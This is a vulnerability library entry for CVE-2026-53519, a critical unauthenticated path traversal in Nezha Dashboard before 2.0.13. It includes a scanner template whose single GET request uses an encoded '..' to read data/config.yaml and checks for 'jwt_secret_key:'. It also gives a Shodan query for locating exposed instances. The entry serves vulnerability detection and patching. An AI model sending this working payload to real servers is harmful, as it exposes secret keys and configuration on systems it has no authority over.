/Vulnerability Library

Nezha Dashboard < 2.0.13 - Path Traversal

CVE-2026-53519
Verified

Description

Nezha Monitoring < 2.0.13 contains a path traversal caused by improper prefix checking in the dashboard's NoRoute handler, letting unauthenticated attackers read arbitrary files via crafted URLs.

Severity

Critical

CVSS Score

9.1

Exploit Probability

2%

Published Date

August 6, 2026

Template Author

aryu-ru, str4k3r

CVE-2026-53519.yaml
id: CVE-2026-53519

info:
  name: Nezha Dashboard < 2.0.13 - Path Traversal
  author: Aryu-RU,str4k3r
  severity: critical
  description: |
    Nezha Monitoring < 2.0.13 contains a path traversal caused by improper prefix checking in the dashboard's NoRoute handler, letting unauthenticated attackers read arbitrary files via crafted URLs.
  impact: |
    Unauthenticated attackers can read arbitrary files on the server, potentially exposing sensitive configuration or data files.
  remediation: |
    Update to version 2.0.13 or later.
  reference:
    - https://github.com/nezhahq/nezha/security/advisories/GHSA-5c25-7vpj-9mqh
    - https://nvd.nist.gov/vuln/detail/CVE-2026-53519
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2026-53519
    epss-score: 0.01928
    epss-percentile: 0.78829
    cwe-id: CWE-22
  metadata:
    verified: true
    shodan-query: title:"Nezha"
  tags: cve,cve2026,nezha,lfi,traversal,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/dashboard%2e%2e/data/config.yaml"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "jwt_secret_key:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b267702275615335d7c005acd1d374255a64930a19502c63d29ca02b1dc71ab40221009259478c3c3fbfa03b04e5cff51563a2507fdfa7feff7fffff51285bc3912966:922c64590222798bb761d5b6d8e72950
9.1Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
CVE ID:
cve-2026-53519
CWE ID:
cwe-22

References

https://github.com/nezhahq/nezha/security/advisories/GHSA-5c25-7vpj-9mqhhttps://nvd.nist.gov/vuln/detail/CVE-2026-53519

Remediation Steps

Update to version 2.0.13 or later.